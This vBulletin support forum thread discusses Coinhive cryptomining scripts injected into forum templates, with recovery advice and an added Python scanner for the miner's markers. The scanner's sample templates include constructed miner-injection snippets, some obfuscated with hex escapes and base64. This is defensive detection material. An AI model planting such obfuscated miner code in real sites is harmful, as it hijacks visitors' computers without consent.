Discovered coin mining script coinhive injected in template

  • Zackw
    Senior Member
    • Aug 2010
    • 150
    • 4.0.x

    [Forum] Discovered coin mining script coinhive injected in template

    Hello,
    I'm on VB 4.2.3 PL 1.
    The only plugins I have are Bluepearl, social page icons, disable lockout notification emails, glowhost, and tapatalk.


    Somehow someone injected a script into the footer template. I won't post the full script unless anybody is curious, but just know it goes to coinhive.com, pulls the script coinhive.min.js, and that the coinhive user is "XRp4BmFx9n8gReuyEvoeDIVlIFS4DfQq".

    It should be noted that coinhive itself, as well as this script, may be perfectly valid technology someone may choose to install on their own website and give users an option to allow it or not as an alternate income to using ads.
    But of course, in my case, I don't want it, it was injected into VB, and I removed it.

    That said, we discovered it on November 13th; it was probably installed that day, or maybe the day before. Users started getting their security tools blocking our forum.

    I would like additional information about how the hell these things get injected into our templates in the first place. When I ran the system file checker tool, it didn't see any files out of the ordinary.
    I have to assume this was not done via an admin user or through the control panel; it was more likely some vulnerability in the forum itself, through the API or I don't know what. There is no backtrace for the template change (unless there is??).

    What can I do further to guard against these freaking tools from putting code into my site at will? The script injected itself into a very specific place in the footer template. Not just appended to the top or bottom but went directly after the copyright notice. How is this possible?

    Everybody on VB4 should scan often for coinhive.
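
The scan the poster recommends, as an added example that is not part of the original post and not vBulletin code: a Python script that checks template text for the Coinhive markers named in the thread (coinhive.com, coinhive.min.js, a 32-character site key), the other domains Coinhive served from (coin-hive.com, authedmine.com) and the public Coinhive JavaScript API constructors, after undoing the JS hex/percent escapes and atob() base64 wrapping that injected copies commonly hide behind. That wrapping, the sample templates and the site key "K"*32 are constructed for the example. Where the template bodies come from (a style export from the AdminCP, or the database) is left to the reader.

```python
"""Scan vBulletin template text (or any HTML/JS) for Coinhive miner markers."""
import base64
import re

# Markers: the domains/file named in the thread, Coinhive's other domains,
# and the public Coinhive JavaScript API constructors.
INDICATORS = [re.compile(p, re.IGNORECASE) for p in (
    r"coinhive\.com",
    r"coin-hive\.com",
    r"authedmine\.com",
    r"coinhive\.min\.js",
    r"CoinHive\.(?:Anonymous|User|Token)",
)]
# Coinhive site keys, like the one quoted in the thread, are 32 alphanumerics.
SITE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User|Token)\(\s*['\"]([A-Za-z0-9]{32})['\"]")

HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
PCT_ESC = re.compile(r"%([0-9a-fA-F]{2})")
ATOB_ARG = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def decode_layers(text):
    """Yield (layer, text): the raw template, then each decoded view of it.

    Assumption: injected copies hide behind JS/URL escapes or atob() blobs.
    """
    yield "raw", text
    unescaped = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    unescaped = PCT_ESC.sub(lambda m: chr(int(m.group(1), 16)), unescaped)
    if unescaped != text:
        yield "unescaped", unescaped
    for m in ATOB_ARG.finditer(unescaped):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            continue
        yield "base64", decoded


def scan_template(title, text):
    """Return one finding per (layer, indicator) hit, with a snippet of context."""
    findings = []
    for layer, view in decode_layers(text):
        for pattern in INDICATORS:
            m = pattern.search(view)
            if m:
                start = max(0, m.start() - 40)
                findings.append({"template": title, "layer": layer,
                                 "indicator": pattern.pattern,
                                 "context": view[start:m.end() + 40]})
    return findings


def scan_templates(templates):
    """templates: {template title: template body} -> all findings."""
    findings = []
    for title, text in templates.items():
        findings.extend(scan_template(title, text))
    return findings


def extract_site_keys(text):
    """Site keys found in any layer, in order of first appearance."""
    keys = []
    for _layer, view in decode_layers(text):
        for key in SITE_KEY_RE.findall(view):
            if key not in keys:
                keys.append(key)
    return keys


# --- constructed sample templates (not real forum content) ---
SITE_KEY = "K" * 32
LOADER = '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
MINER = ('<script>var miner = new CoinHive.Anonymous("%s"); miner.start();</script>'
         % SITE_KEY)
SAMPLE_TEMPLATES = {
    # plain injection right after the copyright notice, as in the thread
    "footer": '<div id="copyright">Copyright &copy; 2017 Example Forum</div>' + LOADER + MINER,
    # same loader hidden behind JS hex escapes in document.write()
    "header": '<script>document.write("%s");</script>'
              % "".join("\\x%02x" % b for b in LOADER.encode()),
    # miner start-up hidden in a base64 blob passed to atob()
    "headinclude": '<script>document.write(atob("%s"));</script>'
                   % base64.b64encode(MINER.encode()).decode(),
    "navbar": '<div class="navbar">Forum | Members</div>',
}

if __name__ == "__main__":
    for f in scan_templates(SAMPLE_TEMPLATES):
        print("%-12s %-10s %-30s %s" % (f["template"], f["layer"],
                                        f["indicator"], f["context"]))
    print("site keys:", extract_site_keys("".join(SAMPLE_TEMPLATES.values())))
```

Findings come back per template and per decoding layer, so a hit that only shows up in the "unescaped" or "base64" layer tells you the injection was obfuscated, which is worth knowing when you search the rest of the site and the database for the same payload.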
  • Mark.B
    vBulletin Support
    • Feb 2004
    • 24286
    • 6.0.X

    #2
    The first thing you should be looking for is unexpected plugins. Look in the plugin section, particularly under the 'vBulletin' product. Is there anything there you don't recognise?
    Look under usergroups and show all primary users for the administrators group. Anybody there you don't recognise? Delete them if so.

    4.2.3 has a PL2, so you should be running that at the very least. Ideally upgrade to 4.2.5, though this requires PHP 5.6 as a minimum, so watch out for that.

    It's possible though that they got in via the server. Your hosts can help with that.

    We have an article for recovering and securing hacked sites:
    This guide is for what to do after you've been hacked, exploited, and/or defaced. Step 1, Change everything: If you believe, or think your site has
    MARK.B
    vBulletin Support
    ------------
    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com


    • Zackw
      Senior Member
      • Aug 2010
      • 150
      • 4.0.x

      #3
      Hi Mark
      Thanks.

      Plugins appear to be fine, nothing seems odd. And note that the entire blog and CMS part are turned off, so all those are crossed out.
      All the rest of the plugins are from Tapatalk, GlowHost, and disable lockout emails.

      I only have 4 admins, I'm going to have us all do password resets.


      What do you mean by getting in through the server? Just like a direct MySQL connection or FTP? What other way could there be?

      What if they did it via access to some PHP script somewhere? Do you guys have a tool that can check for correct file/folder permissions or scan for PHP files where they shouldn't be?

      cheers


      • bevans84
        New Member
        • Jun 2004
        • 9

        #4
        Same thing happened to me. VB 4.2.5.
        Script was placed in ad_footer_start
        I'm the only admin for both the server and the VB installation.

        • Mark.B
          vBulletin Support
          • Feb 2004
          • 24286
          • 6.0.X

          #5
          You should go through ALL the steps in the article linked to previously.

          The fact you're the only admin on the server doesn't preclude others gaining access, that's the whole point.

          • bevans84
            New Member
            • Jun 2004
            • 9

            #6
            I fixed mine a week ago,
            A simple google search indicates that we're not the only two. Just sayin'


            • Mark.B
              vBulletin Support
              • Feb 2004
              • 24286
              • 6.0.X

              #7
              Originally posted by bevans84
              I fixed mine a week ago,
              A simple google search indicates that we're not the only two. Just sayin'
              The filestore hack has been around for years. It is not due to any exploit in vBulletin though, if that's what you're driving at.

              Most, but not all, victims have run vBSEO at some point. vBSEO is a third party product that has been obsolete for many years and should not be used on any site.

              Those not running vBSEO generally have insecure plugins running.

              • amfor
                New Member
                • Aug 2012
                • 3
                • 3.8.x

                #8
                The same problem happened to me today. I use vBulletin 3.8.11. Members of the forum informed me that the forum was infected by coinhive. I found the code in the header template and removed it. But I do not understand how they installed it.

                Has anybody found the backdoor in vBulletin or in the modules? I had the vBSEO module, but it was disabled. Now I have removed it completely.

                Does anybody have any other ideas on how they install infected code into the templates?


                • Mark.B
                  vBulletin Support
                  • Feb 2004
                  • 24286
                  • 6.0.X

                  #9
                  Originally posted by amfor
                  The same problem happened to me today. I use vBulletin 3.8.11. Members of the forum informed me that the forum was infected by coinhive. I found the code in the header template and removed it. But I do not understand how they installed it.

                  Has anybody found the backdoor in vBulletin or in the modules? I had the vBSEO module, but it was disabled. Now I have removed it completely.

                  Does anybody have any other ideas on how they install infected code into the templates?
                  vBSEO is almost certainly how they got in. Could have opened a backdoor while it was still there, or parts of the code could still be present.

                  • Dreslough
                    New Member
                    • Aug 2006
                    • 4
                    • 3.6.x

                    #10
                    Greetings! Thank you for posting this! We're running 4.2.4 and I just discovered the same problem. I've been ripping apart my computer all day, assuming I was dealing with a serious hardware or software problem -- until I realized that I had a tab open to our company's forum, and when I closed the vBulletin tab, my computer started working normally again (and the CPU usage dropped from 99% to 2%).

                    Alas, I'm a vBulletin novice. My forum (http://mogulforums.com/) is supplementary to my business, so I've never had the time to develop any expertise with it. I'm staring at the Admin CP right now, and I have no idea how to "scan often for coinhive". So I'm still infected. Could someone please lead me through the steps to find and remove the offending code? (e.g. exactly what do I click on the Admin CP menu etc.)

                    Thanks!

                    Also, I have never added any plug-ins or modules, and there are no plug-ins listed in the CP. And I've never heard of vBSEO. It's highly unlikely that a hacker figured out my password, but is there a way to verify this? For example, can I see a log of times my account was accessed and compare it to the [very few] times that I am actually logged in?
                    Sports and sports game discussion forum


                    • Dreslough
                      New Member
                      • Aug 2006
                      • 4
                      • 3.6.x

                      #11
                      FYI, a screenshot of my "plug-ins" page, so you can confirm that I'm actually looking at the right page.

                      I also write software, so I know that problems often come down to "user error". I don't mind being called an idiot if you also help me fix this. Thanks!


                      • Trevor Hannant
                        vBulletin Support
                        • Aug 2002
                        • 24325
                        • 5.7.X

                        #12
                        That's the Product page, not the Plugin page - go to:

                        AdminCP > Plugins & Products > Plugin Manager
                        Vote for:

                        - Admin Settable Paid Subscription Reminder Timeframe (vB6)
                        - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)
